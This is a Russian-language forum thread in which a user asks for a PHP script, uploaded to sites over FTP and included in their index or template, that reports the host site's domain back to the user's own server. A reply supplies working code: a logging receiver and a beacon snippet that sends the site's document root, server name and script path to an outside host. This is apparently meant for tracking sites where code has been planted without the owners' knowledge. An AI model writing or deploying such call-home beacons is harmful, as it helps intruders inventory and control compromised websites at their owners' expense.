Нужен скрипт скрипт пхп заливаем через фтп а этот скрипт пингует мой сервер или сайт, Нужно чтобы узнать домен сайта где лижит мой скрипт есть чтонибудь подобное?
можно, только если будет возможность запустить этот залитый php-скрипт. Сам по себе он не запустится (крон, инклуд)
крон отпадает сразу, какой там крон в фтп ? А инклюд можно в шаб запихнуть или в индекс, но я так понимаю если сайт не посищаем то фиг даждешси пинга? Или если бот загрузит индекс то скрипт пинг сделает?
Вот разобрались как скрипт работать будет, Ни кто не на кодит его? нужен сам пингатор чтобы пингавал на сервер отсылал урл и ип сервера где находится скрипт. Ну и приемщик который будет записывать результат отправки пингатора, например в log.txt
Делаеш у себя админку: admin.php PHP: <?php file_put_contents('log.txt', $_SERVER['REQUEST_URI']."\r\n", FILE_APPEND); ?> Делаеш бота, вставляеш код в индекс сайта: PHP: <?php define('DCR', $_SERVER['DOCUMENT_ROOT']); define('SRN', $_SERVER['SERVER_NAME']); define('SCN', $_SERVER['SCRIPT_NAME']); $fp = @file_get_contents('http://localhost/admin.php?DCR='.DCR.'&SRN='.SRN.'&SCN='.SCN); ?> В итоге будеш получать логи такого вида: SRN=localhost - это и есть домен. SCN=/fake.php - это с какого файла был отстук. Модифицируй сам, чтоб логи по пицот раз не дублировались